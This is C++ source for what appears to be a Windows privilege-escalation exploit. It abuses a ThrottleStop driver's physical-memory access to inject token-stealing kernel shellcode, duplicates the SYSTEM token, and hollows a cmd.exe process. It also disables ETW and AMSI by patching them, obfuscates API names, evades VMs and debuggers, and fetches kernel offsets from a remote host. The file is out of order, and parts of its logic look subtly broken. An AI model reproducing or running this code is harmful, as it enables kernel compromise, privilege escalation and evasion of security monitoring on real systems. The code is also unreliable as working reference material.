for (size_t i = 0; i < sizeof(moduleName) && encApi->ModuleName[i] != '\0'; i++) {
moduleName[i] = encApi->ModuleName[i] ^ (encApi->Key + i) & 0xFF;
}
char functionName[128];
for (size_t i = 0; i < sizeof(functionName) && encApi->FunctionName[i] != '\0'; i++) {
functionName[i] = encApi->FunctionName[i] ^ (encApi->Key + i) & 0xFF;
}
HMODULE hModule = GetModuleHandleA(moduleName);
if (!hModule) {
hModule = LoadLibraryA(moduleName);
if (!hModule) {
return NULL;
}
}
return GetProcAddress(hModule, functionName);
}
HANDLE GetThrottleStopDeviceHandleImproved() {
ENCRYPTED_STRING encDevicePath = {
{ 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19 },
15,
0x55
};
char devicePath[256];
DecryptString(&encDevicePath, devicePath);
wchar_t wDevicePath[256];
size_t convertedChars;
mbstowcs_s(&convertedChars, wDevicePath, 256, devicePath, _TRUNCATE);
if (g_bStealthMode) {
wDevicePath[8] = (wDevicePath[8] == 'T') ? 't' : 'T';
}
HANDLE hDevice = CreateFile(
wDevicePath,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE) {
return NULL;
}
return hDevice;
}
bool ReadPhysicalMemoryImproved(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) {
if (!hDevice || !Buffer || Size == 0) {
return false;
}
DWORD dwBytesReturned = 0;
IOCTL_PHYS_MEMORY Input = { 0 };
Input.PhysicalAddress = PhysicalAddress;
Input.Buffer = Buffer;
Input.Size = Size;
ULONG IoctlCode = 0;
switch (Version) {
case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_READ; break;
case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_READ; break;
case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_READ; break;
case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_READ; break;
case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_READ; break;
default: return FALSE;
}
BOOL result = DeviceIoControl(
hDevice,
IoctlCode,
&Input,
sizeof(Input),
&Input,
sizeof(Input),
&dwBytesReturned,
NULL
);
if (!result || dwBytesReturned != Size) {
return false;
}
return true;
}
bool WritePhysicalMemoryImproved(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) {
if (!hDevice || !Buffer || Size == 0) {
return false;
}
DWORD dwBytesReturned = 0;
IOCTL_PHYS_MEMORY Input = { 0 };
Input.PhysicalAddress = PhysicalAddress;
Input.Buffer = Buffer;
Input.Size = Size;
ULONG IoctlCode = 0;
switch (Version) {
case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_WRITE; break;
case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_WRITE; break;
case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_WRITE; break;
case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_WRITE; break;
case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_WRITE; break;
default: return FALSE;
}
BOOL result = DeviceIoControl(
hDevice,
IoctlCode,
&Input,
sizeof(Input),
&Input,
sizeof(Input),
&dwBytesReturned,
NULL
);
if (!result || dwBytesReturned != Size) {
return false;
}
return true;
}
bool ReadPhysicalMemorySafe(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) {
const SIZE_T CHUNK_SIZE = 4096;
for (SIZE_T offset = 0; offset < Size; offset += CHUNK_SIZE) {
SIZE_T chunkSize = std::min(CHUNK_SIZE, Size - offset);
if (!ReadPhysicalMemoryImproved(
hDevice,
PhysicalAddress + offset,
(PVOID)((ULONG_PTR)Buffer + offset),
chunkSize,
Version
)) {
return false;
}
RandomSleep();
}
return true;
}
bool WritePhysicalMemorySafe(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) {
const SIZE_T CHUNK_SIZE = 4096;
for (SIZE_T offset = 0; offset < Size; offset += CHUNK_SIZE) {
SIZE_T chunkSize = std::min(CHUNK_SIZE, Size - offset);
if (!WritePhysicalMemoryImproved(
hDevice,
PhysicalAddress + offset,
(PVOID)((ULONG_PTR)Buffer + offset),
chunkSize,
Version
)) {
return false;
}
RandomSleep();
}
return true;
}
PVOID GetKernelBase() {
LPVOID drivers[1024];
DWORD cbNeeded;
int nDrivers;
if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded)) {
nDrivers = cbNeeded / sizeof(drivers[0]);
for (int i = 0; i < nDrivers; i++) {
CHAR szDriver[1024];
if (GetDeviceDriverBaseNameA(drivers[i], szDriver, sizeof(szDriver))) {
if (strcmp(szDriver, "ntoskrnl.exe") == 0) {
return drivers[i];
}
}
}
}
return NULL;
}
DWORD GetWindowsVersion() {
if (g_dwWindowsVersion != 0) {
return g_dwWindowsVersion;
}
static pRtlGetVersion RtlGetVersionPtr = NULL;
if (!RtlGetVersionPtr) {
RtlGetVersionPtr = (pRtlGetVersion)GetProcAddress(
GetModuleHandleA("ntdll.dll"), "RtlGetVersion");
}
if (RtlGetVersionPtr) {
RTL_OSVERSIONINFOW osvi = { 0 };
osvi.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOW);
if (RtlGetVersionPtr(&osvi) == 0) {
g_dwWindowsVersion = (osvi.dwMajorVersion << 24) |
(osvi.dwMinorVersion << 16) |
osvi.dwBuildNumber;
return g_dwWindowsVersion;
}
}
return 0;
}
bool DiscoverKernelOffsets(SHELLCODE_METADATA* metadata) {
PVOID kernelBase = GetKernelBase();
if (!kernelBase) {
return false;
}
PVOID psInitialSystemProcess = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
if (!psInitialSystemProcess) {
return false;
}
PVOID kernelPsInitialSystemProcess = (PVOID)((ULONG_PTR)kernelBase +
(ULONG_PTR)psInitialSystemProcess -
(ULONG_PTR)GetModuleHandleA("ntdll.dll"));
HANDLE hDevice = GetThrottleStopDeviceHandleImproved();
if (!hDevice) {
return false;
}
ULONG64 systemProcessAddr = 0;
for (ULONG version = 1; version <= 5; version++) {
if (ReadPhysicalMemoryImproved(hDevice, (ULONG64)kernelPsInitialSystemProcess, &systemProcessAddr, sizeof(systemProcessAddr), version)) {
break;
}
}
if (systemProcessAddr == 0) {
CloseHandle(hDevice);
return false;
}
for (ULONG64 offset = 0; offset < 0x1000; offset += 8) {
ULONG64 value = 0;
if (ReadPhysicalMemoryImproved(hDevice, systemProcessAddr + offset, &value, sizeof(value), 1)) {
if (value == SYSTEM_PID) {
metadata->UniqueProcessIdOffset = offset;
break;
}
}
}
if (metadata->UniqueProcessIdOffset == 0) {
CloseHandle(hDevice);
return false;
}
DWORD windowsVersion = GetWindowsVersion();
DWORD majorVersion = (windowsVersion >> 24) & 0xFF;
DWORD minorVersion = (windowsVersion >> 16) & 0xFF;
if (majorVersion == 10 && minorVersion == 0) {
metadata->TokenOffset = 0x4b8;
metadata->ActiveProcessLinksOffset = 0x448;
metadata->EPROCESS_Size = 0x8d0;
metadata->KTHREAD_Offset = 0x188;
metadata->EPROCESS_Offset = 0x220;
} else if (majorVersion == 6 && minorVersion >= 1 && minorVersion <= 3) {
metadata->TokenOffset = 0x348;
metadata->ActiveProcessLinksOffset = 0x188;
metadata->EPROCESS_Size = 0x6c0;
metadata->KTHREAD_Offset = 0x188;
metadata->EPROCESS_Offset = 0x220;
} else if (majorVersion == 6 && minorVersion == 0) {
metadata->TokenOffset = 0x320;
metadata->ActiveProcessLinksOffset = 0x160;
metadata->EPROCESS_Size = 0x5d0;
metadata->KTHREAD_Offset = 0x188;
metadata->EPROCESS_Offset = 0x220;
} else if (majorVersion == 5 && minorVersion >= 1 && minorVersion <= 2) {
metadata->TokenOffset = 0x1c0;
metadata->ActiveProcessLinksOffset = 0x98;
metadata->EPROCESS_Size = 0x3c0;
metadata->KTHREAD_Offset = 0x188;
metadata->EPROCESS_Offset = 0x220;
} else {
metadata->TokenOffset = 0x4b8;
metadata->ActiveProcessLinksOffset = 0x448;
metadata->EPROCESS_Size = 0x8d0;
metadata->KTHREAD_Offset = 0x188;
metadata->EPROCESS_Offset = 0x220;
}
CloseHandle(hDevice);
return true;
}
bool UpdateOffsetsFromRemote(SHELLCODE_METADATA* metadata) {
HINTERNET hInternet = InternetOpen(L"Mozilla/5.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (!hInternet) {
return false;
}
HINTERNET hConnect = InternetConnect(hInternet, L"example.com", INTERNET_DEFAULT_HTTPS_PORT,
NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (!hConnect) {
InternetCloseHandle(hInternet);
return false;
}
DWORD windowsVersion = GetWindowsVersion();
wchar_t url[256];
swprintf_s(url, sizeof(url)/sizeof(wchar_t), L"/api/offsets/%08X.json", windowsVersion);
HINTERNET hRequest = HttpOpenRequest(hConnect, L"GET", url, NULL, NULL, NULL,
INTERNET_FLAG_SECURE, 0);
if (!hRequest) {
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
return false;
}
if (!HttpSendRequest(hRequest, NULL, 0, NULL, 0)) {
InternetCloseHandle(hRequest);
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
return false;
}
CHAR buffer[4096];
DWORD bytesRead;
std::string jsonData;
while (InternetReadFile(hRequest, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) {
jsonData.append(buffer, bytesRead);
}
InternetCloseHandle(hRequest);
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
if (jsonData.empty()) {
return false;
}
char tempPath[MAX_PATH];
GetTempPathA(MAX_PATH, tempPath);
char offsetFilePath[MAX_PATH];
sprintf_s(offsetFilePath, "%s\\offsets_%08X.dat", tempPath, windowsVersion);
std::ofstream outFile(offsetFilePath, std::ios::binary);
if (outFile) {
outFile.write(jsonData.c_str(), jsonData.size());
outFile.close();
std::ifstream inFile(offsetFilePath, std::ios::binary);
if (inFile) {
inFile.read(reinterpret_cast<char*>(metadata), sizeof(SHELLCODE_METADATA));
inFile.close();
return true;
}
}
return false;
}
bool GetKernelOffsetsImproved(SHELLCODE_METADATA* metadata) {
char tempPath[MAX_PATH];
GetTempPathA(MAX_PATH, tempPath);
DWORD windowsVersion = GetWindowsVersion();
char offsetFilePath[MAX_PATH];
sprintf_s(offsetFilePath, "%s\\offsets_%08X.dat", tempPath, windowsVersion);
std::ifstream inFile(offsetFilePath, std::ios::binary);
if (inFile) {
inFile.read(reinterpret_cast<char*>(metadata), sizeof(SHELLCODE_METADATA));
inFile.close();
return true;
}
if (UpdateOffsetsFromRemote(metadata)) {
std::ifstream inFile(offsetFilePath, std::ios::binary);
if (inFile) {
inFile.read(reinterpret_cast<char*>(metadata), sizeof(SHELLCODE_METADATA));
inFile.close();
return true;
}
}
return DiscoverKernelOffsets(metadata);
}
void AddPrologue(std::vector<BYTE>& shellcode) {
std::vector<BYTE> junkInstructions = {
0x90, 0x90, 0x90,
0x48, 0x31, 0xC0,
0x48, 0x31, 0xDB,
0x48, 0x31, 0xC9,
0x48, 0x31, 0xD2
};
std::shuffle(junkInstructions.begin(), junkInstructions.end(), gen);
for (size_t i = 0; i < 5; i++) {
shellcode.push_back(junkInstructions[i]);
}
BYTE prologue[] = {
0x48, 0x31, 0xC0,
0x65, 0x48, 0x8B, 0x60, 0x18
};
shellcode.insert(shellcode.end(), prologue, prologue + sizeof(prologue));
}
void AddGetCurrentProcess(std::vector<BYTE>& shellcode) {
BYTE getCurrentProcess[] = {
0x48, 0x8B, 0xB0, 0xB8, 0x00, 0x00, 0x00,
0x48, 0x8B, 0x76, 0x40
};
shellcode.insert(shellcode.end(), getCurrentProcess, getCurrentProcess + sizeof(getCurrentProcess));
}
void AddFindSystemProcess(std::vector<BYTE>& shellcode, SHELLCODE_METADATA* metadata) {
BYTE activeProcessLinksOffset = (BYTE)(metadata->ActiveProcessLinksOffset - 8);
BYTE findSystemProcess[] = {
0x48, 0x8B, 0x5E, activeProcessLinksOffset,
0x48, 0x8B, 0x1B,
0x48, 0x83, 0xFB, 0x04,
0x75, 0xF0
};
shellcode.insert(shellcode.end(), findSystemProcess, findSystemProcess + sizeof(findSystemProcess));
}
void AddCopyToken(std::vector<BYTE>& shellcode, SHELLCODE_METADATA* metadata) {
BYTE tokenOffset = (BYTE)(metadata->TokenOffset - 8);
BYTE copyToken[] = {
0x48, 0x8B, 0x5B, tokenOffset,
0x48, 0x8B, 0x43, 0x70,
0x48, 0x89, 0x43, 0x70
};
shellcode.insert(shellcode.end(), copyToken, copyToken + sizeof(copyToken));
}
void AddEpilogue(std::vector<BYTE>& shellcode) {
BYTE epilogue[] = {
0xC3
};
shellcode.insert(shellcode.end(), epilogue, epilogue + sizeof(epilogue));
}
void EncryptShellcode(std::vector<BYTE>& shellcode, int layer) {
DWORD key = GetTickCount() & 0xFF;
for (size_t i = 0; i < shellcode.size(); i++) {
shellcode[i] ^= (key + i + layer) & 0xFF;
}
}
bool BuildTrulyDynamicShellcode(BYTE** shellcode, SIZE_T* shellcodeSize, SHELLCODE_METADATA* metadata) {
std::vector<BYTE> generatedShellcode;
AddPrologue(generatedShellcode);
AddGetCurrentProcess(generatedShellcode);
AddFindSystemProcess(generatedShellcode, metadata);
AddCopyToken(generatedShellcode, metadata);
AddEpilogue(generatedShellcode);
for (int layer = 0; layer < 3; layer++) {
EncryptShellcode(generatedShellcode, layer);
}
*shellcodeSize = generatedShellcode.size();
*shellcode = (BYTE*)malloc(*shellcodeSize);
if (!*shellcode) {
return false;
}
memcpy(*shellcode, generatedShellcode.data(), *shellcodeSize);
return true;
}
ULONG64 GetPhysicalAddressAccurate(PVOID VirtualAddress) {
HANDLE hDevice = GetThrottleStopDeviceHandleImproved();
if (!hDevice) {
return 0;
}
PVOID kernelBase = GetKernelBase();
if (!kernelBase) {
CloseHandle(hDevice);
return 0;
}
ULONG64 offset = (ULONG64)VirtualAddress - (ULONG_PTR)kernelBase;
ULONG64 physicalAddress = 0;
DWORD dwBytesReturned = 0;
typedef struct _VIRTUAL_TO_PHYSICAL {
PVOID VirtualAddress;
ULONG64 PhysicalAddress;
} VIRTUAL_TO_PHYSICAL, *PVIRTUAL_TO_PHYSICAL;
VIRTUAL_TO_PHYSICAL v2p = { 0 };
v2p.VirtualAddress = VirtualAddress;
for (ULONG version = 1; version <= 5; version++) {
ULONG IoctlCode = 0;
switch (version) {
case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_READ + 0x10; break;
case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_READ + 0x10; break;
case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_READ + 0x10; break;
case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_READ + 0x10; break;
case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_READ + 0x10; break;
default: continue;
}
if (DeviceIoControl(
hDevice,
IoctlCode,
&v2p,
sizeof(v2p),
&v2p,
sizeof(v2p),
&dwBytesReturned,
NULL
)) {
physicalAddress = v2p.PhysicalAddress;
break;
}
}
CloseHandle(hDevice);
return physicalAddress;
}
bool PatchKernelForPrivilegeEscalationSafe(HANDLE hDevice, ULONG DriverVersion) {
PVOID KernelBase = GetKernelBase();
if (!KernelBase) {
return false;
}
SHELLCODE_METADATA metadata = { 0 };
if (!GetKernelOffsetsImproved(&metadata)) {
return false;
}
BYTE* shellcode = NULL;
SIZE_T shellcodeSize = 0;
if (!BuildTrulyDynamicShellcode(&shellcode, &shellcodeSize, &metadata)) {
return false;
}
PVOID targetFunction = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx");
if (!targetFunction) {
free(shellcode);
return false;
}
PVOID kernelFunction = (PVOID)((ULONG_PTR)KernelBase + (ULONG_PTR)targetFunction - (ULONG_PTR)GetModuleHandleA("ntdll.dll"));
ULONG64 physicalAddress = GetPhysicalAddressAccurate(kernelFunction);
if (!physicalAddress) {
free(shellcode);
return false;
}
std::vector<BYTE> originalBytes(shellcodeSize);
if (!ReadPhysicalMemorySafe(hDevice, physicalAddress, originalBytes.data(), originalBytes.size(), DriverVersion)) {
free(shellcode);
return false;
}
for (SIZE_T i = 0; i < shellcodeSize; i++) {
shellcode[i] ^= 0xAA;
}
__try {
if (!WritePhysicalMemorySafe(hDevice, physicalAddress, shellcode, shellcodeSize, DriverVersion)) {
__leave;
}
HANDLE hThread = NULL;
static pNtCreateThreadEx NtCreateThreadExPtr = NULL;
if (!NtCreateThreadExPtr) {
NtCreateThreadExPtr = (pNtCreateThreadEx)GetProcAddress(
GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx");
}
if (NtCreateThreadExPtr) {
NTSTATUS status = NtCreateThreadExPtr(
&hThread,
THREAD_ALL_ACCESS,
NULL,
GetCurrentProcess(),
(LPTHREAD_START_ROUTINE)kernelFunction,
NULL,
FALSE,
0,
0,
0,
NULL
);
if (!NT_SUCCESS(status)) {
hThread = NULL;
}
}
if (!hThread) {
hThread = CreateRemoteThread(
GetCurrentProcess(),
NULL,
0,
(LPTHREAD_START_ROUTINE)kernelFunction,
NULL,
0,
NULL
);
}
if (hThread) {
WaitForSingleObject(hThread, 5000);
CloseHandle(hThread);
}
}
__finally {
WritePhysicalMemorySafe(hDevice, physicalAddress, originalBytes.data(), originalBytes.size(), DriverVersion);
}
free(shellcode);
return true;
}
bool DisableETWWithEncryptedAPIs() {
ENCRYPTED_API encApi = {
{ 0x6E, 0x6F, 0x6C, 0x6C, 0x64, 0x2E, 0x64, 0x6C, 0x6C },
{ 0x45, 0x74, 0x77, 0x45, 0x76, 0x65, 0x6E, 0x74, 0x57, 0x72, 0x69, 0x74, 0x65 },
0xAA
};
PVOID EtwEventWriteAddress = GetEncryptedProcAddress(&encApi);
if (!EtwEventWriteAddress) {
return false;
}
DWORD oldProtect;
if (!VirtualProtect(EtwEventWriteAddress, 1, PAGE_EXECUTE_READWRITE, &oldProtect)) {
return false;
}
*(BYTE*)EtwEventWriteAddress = 0xC3;
VirtualProtect(EtwEventWriteAddress, 1, oldProtect, &oldProtect);
return true;
}
bool DisableAMSIWithEncryptedAPIs() {
ENCRYPTED_API encApi = {
{ 0x61, 0x6D, 0x73, 0x69, 0x2E, 0x64, 0x6C, 0x6C },
{ 0x41, 0x6D, 0x73, 0x69, 0x53, 0x63, 0x61, 0x6E, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72 },
0xAA
};
PVOID AmsiScanBufferAddress = GetEncryptedProcAddress(&encApi);
if (!AmsiScanBufferAddress) {
return false;
}
DWORD oldProtect;
if (!VirtualProtect(AmsiScanBufferAddress, 6, PAGE_EXECUTE_READWRITE, &oldProtect)) {
return false;
}
BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
memcpy(AmsiScanBufferAddress, patch, sizeof(patch));
VirtualProtect(AmsiScanBufferAddress, 6, oldProtect, &oldProtect);
return true;
}
bool StealSystemToken() {
HANDLE hSystemProcess = NULL;
HANDLE hToken = NULL;
HANDLE hNewToken = NULL;
DWORD dwPID = SYSTEM_PID;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
return false;
}
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if (pe32.th32ProcessID == dwPID) {
hSystemProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
break;
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
if (!hSystemProcess) {
return false;
}
if (!OpenProcessToken(hSystemProcess, TOKEN_DUPLICATE, &hToken)) {
CloseHandle(hSystemProcess);
return false;
}
if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) {
CloseHandle(hToken);
CloseHandle(hSystemProcess);
return false;
}
if (!ImpersonateLoggedOnUser(hNewToken)) {
CloseHandle(hToken);
CloseHandle(hNewToken);
CloseHandle(hSystemProcess);
return false;
}
CloseHandle(hToken);
CloseHandle(hNewToken);
CloseHandle(hSystemProcess);
return true;
}
bool CreateProcessWithHollowing(const wchar_t* targetPath, const wchar_t* cmdLine) {
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
if (!CreateProcess(
targetPath,
(LPWSTR)cmdLine,
NULL,
NULL,
FALSE,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi
)) {
return false;
}
CONTEXT context;
context.ContextFlags = CONTEXT_FULL;
if (!GetThreadContext(pi.hThread, &context)) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
static pNtQueryInformationProcess NtQueryInformationProcessPtr = NULL;
if (!NtQueryInformationProcessPtr) {
NtQueryInformationProcessPtr = (pNtQueryInformationProcess)GetProcAddress(
GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess");
}
if (!NtQueryInformationProcessPtr) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
PROCESS_BASIC_INFORMATION pbiInfo;
NTSTATUS status = NtQueryInformationProcessPtr(
pi.hProcess,
ProcessBasicInformation,
&pbiInfo,
sizeof(pbiInfo),
NULL
);
if (!NT_SUCCESS(status)) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
PEB peb;
if (!ReadProcessMemory(pi.hProcess, pbiInfo.PebBaseAddress, &peb, sizeof(peb), NULL)) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
PVOID imageBase = peb.ImageBaseAddress;
IMAGE_DOS_HEADER dosHeader;
if (!ReadProcessMemory(pi.hProcess, imageBase, &dosHeader, sizeof(dosHeader), NULL) ||
dosHeader.e_magic != IMAGE_DOS_SIGNATURE) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
IMAGE_NT_HEADERS ntHeaders;
if (!ReadProcessMemory(pi.hProcess, (PVOID)((ULONG_PTR)imageBase + dosHeader.e_lfanew), &ntHeaders, sizeof(ntHeaders), NULL) ||
ntHeaders.Signature != IMAGE_NT_SIGNATURE) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
if (!VirtualFreeEx(pi.hProcess, imageBase, 0, MEM_RELEASE)) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
PVOID newImageBase = VirtualAllocEx(pi.hProcess, imageBase, ntHeaders.OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!newImageBase) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
HANDLE hFile = CreateFile(targetPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
DWORD fileSize = GetFileSize(hFile, NULL);
BYTE* fileData = (BYTE*)malloc(fileSize);
if (!fileData) {
CloseHandle(hFile);
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
DWORD bytesRead;
if (!ReadFile(hFile, fileData, fileSize, &bytesRead, NULL) || bytesRead != fileSize) {
free(fileData);
CloseHandle(hFile);
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
CloseHandle(hFile);
if (!WriteProcessMemory(pi.hProcess, newImageBase, fileData, ntHeaders.OptionalHeader.SizeOfHeaders, NULL)) {
free(fileData);
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(&ntHeaders);
for (WORD i = 0; i < ntHeaders.FileHeader.NumberOfSections; i++) {
PVOID sectionDest = (PVOID)((ULONG_PTR)newImageBase + sectionHeader[i].VirtualAddress);
PVOID sectionSrc = (PVOID)((ULONG_PTR)fileData + sectionHeader[i].PointerToRawData);
if (!WriteProcessMemory(pi.hProcess, sectionDest, sectionSrc, sectionHeader[i].SizeOfRawData, NULL)) {
free(fileData);
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
}
free(fileData);
context.Rcx = (ULONG_PTR)newImageBase + ntHeaders.OptionalHeader.AddressOfEntryPoint;
if (!SetThreadContext(pi.hThread, &context)) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return false;
}
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return true;
}
void LoadDefaultConfig(EXPLOIT_CONFIG* config) {
wcscpy_s(config->TargetProcess, MAX_PATH, L"C:\\Windows\\System32\\cmd.exe");
wcscpy_s(config->CommandLine, MAX_PATH, L"");
config->CreationFlags = CREATE_NEW_CONSOLE;
config->UseStealthMode = TRUE;
config->DisableETW = TRUE;
config->DisableAMSI = TRUE;
config->MaxRetries = 3;
config->RandomSleepMin = 50;
config->RandomSleepMax = 200;
}
void RandomSleepConfigurable(const EXPLOIT_CONFIG* config) {
if (!config->UseStealthMode) return;
std::uniform_int_distribution<> dis(config->RandomSleepMin, config->RandomSleepMax);
Sleep(dis(gen));
}
int main(int argc, char* argv[]) {
EXPLOIT_CONFIG config;
LoadDefaultConfig(&config);
if (argc > 1) {
wchar_t configFilePath[MAX_PATH];
size_t convertedChars;
mbstowcs_s(&convertedChars, configFilePath, MAX_PATH, argv[1], _TRUNCATE);
}
g_bStealthMode = config.UseStealthMode;
if (IsRunningInVMAdvanced() || IsDebuggerPresentAdvanced()) {
return 0;
}
g_dwWindowsVersion = GetWindowsVersion();
if (config.DisableETW) {
DisableETWWithEncryptedAPIs();
}
if (config.DisableAMSI) {
DisableAMSIWithEncryptedAPIs();
}
HANDLE hDevice = GetThrottleStopDeviceHandleImproved();
if (!hDevice) {
return 1;
}
bool success = false;
for (ULONG version = 1; version <= 5 && !success; version++) {
for (DWORD retry = 0; retry < config.MaxRetries && !success; retry++) {
RandomSleepConfigurable(&config);
if (PatchKernelForPrivilegeEscalationSafe(hDevice, version)) {
success = true;
}
}
}
CloseHandle(hDevice);
if (!success) {
return 1;
}
if (!StealSystemToken()) {
return 1;
}
if (!CreateProcessWithHollowing(config.TargetProcess, config.CommandLine)) {
return 1;
}
return 0;
} ULONG64 ActiveProcessLinksOffset;
ULONG64 EPROCESS_Size;
ULONG64 KTHREAD_Offset;
ULONG64 EPROCESS_Offset;
} SHELLCODE_METADATA, *PSHELLCODE_METADATA;
typedef struct _EXPLOIT_CONFIG {
wchar_t TargetProcess[MAX_PATH];
wchar_t CommandLine[MAX_PATH];
DWORD CreationFlags;
BOOL UseStealthMode;
BOOL DisableETW;
BOOL DisableAMSI;
DWORD MaxRetries;
DWORD RandomSleepMin;
DWORD RandomSleepMax;
} EXPLOIT_CONFIG, *PEXPLOIT_CONFIG;
typedef struct _ENCRYPTED_STRING {
BYTE Data[256];
SIZE_T Length;
DWORD Key;
} ENCRYPTED_STRING, *PENCRYPTED_STRING;
typedef struct _ENCRYPTED_API {
char ModuleName[64];
char FunctionName[128];
DWORD Key;
} ENCRYPTED_API, *PENCRYPTED_API;
std::random_device rd;
std::mt19937 gen(rd());
bool g_bStealthMode = true;
DWORD g_dwWindowsVersion = 0;
typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* pNtCreateThreadEx)(
PHANDLE hThread,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
BOOL CreateSuspended,
ULONG StackZeroBits,
ULONG SizeOfStackCommit,
ULONG SizeOfStackReserve,
LPVOID lpBytesBuffer
);
typedef NTSTATUS(NTAPI* pNtQueryInformationProcess)(
HANDLE ProcessHandle,
PROCESSINFOCLASS ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* pRtlGetVersion)(PRTL_OSVERSIONINFOW);
void RandomSleep() {
if (!g_bStealthMode) return;
std::uniform_int_distribution<> dis(50, 200);
Sleep(dis(gen));
}
bool IsRunningInVMAdvanced() {
if (!g_bStealthMode) return false;
int cpuInfo[4];
__cpuid(cpuInfo, 0x1);
if ((cpuInfo[2] & (1 << 31)) != 0) {
return true;
}
__try {
BYTE invept[] = { 0x66, 0x0F, 0x38, 0x80, 0x00, 0x00, 0x00, 0x00 };
void (*invept_func)() = (void(*)())invept;
invept_func();
} __except(EXCEPTION_EXECUTE_HANDLER) {
return true;
}
HKEY hKey;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"HARDWARE\\DESCRIPTION\\System", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
WCHAR szValue[256];
